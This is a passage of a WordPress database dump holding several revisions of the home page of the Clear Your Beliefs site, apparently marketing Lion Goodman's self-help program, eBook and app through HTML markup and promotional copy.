(1521, 2, '2014-10-09 21:25:42', '2014-10-10 02:25:42', '', 'v-shadow-2', '', 'inherit', 'closed', 'open', '', 'v-shadow-2', '', '', '2014-10-09 21:25:42', '2014-10-10 02:25:42', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1522, 2, '2014-10-09 21:31:56', '2014-10-10 02:31:56', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p>Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n<p style="text-align: center;margin-bottom: 70px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:31:56', '2014-10-10 02:31:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1523, 2, '2014-10-09 21:43:05', '2014-10-10 02:43:05', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:43:05', '2014-10-10 02:43:05', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1524, 2, '2014-10-09 21:43:48', '2014-10-10 02:43:48', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:43:48', '2014-10-10 02:43:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1529, 2, '2014-10-09 23:13:52', '2014-10-10 04:13:52', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 45px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>Copyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 23:13:52', '2014-10-10 04:13:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1526, 2, '2014-10-09 21:52:48', '2014-10-10 02:52:48', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:52:48', '2014-10-10 02:52:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1525, 2, '2014-10-09 21:49:43', '2014-10-10 02:49:43', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\nRecorded Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n<p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-09 21:49:43', '2014-10-10 02:49:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
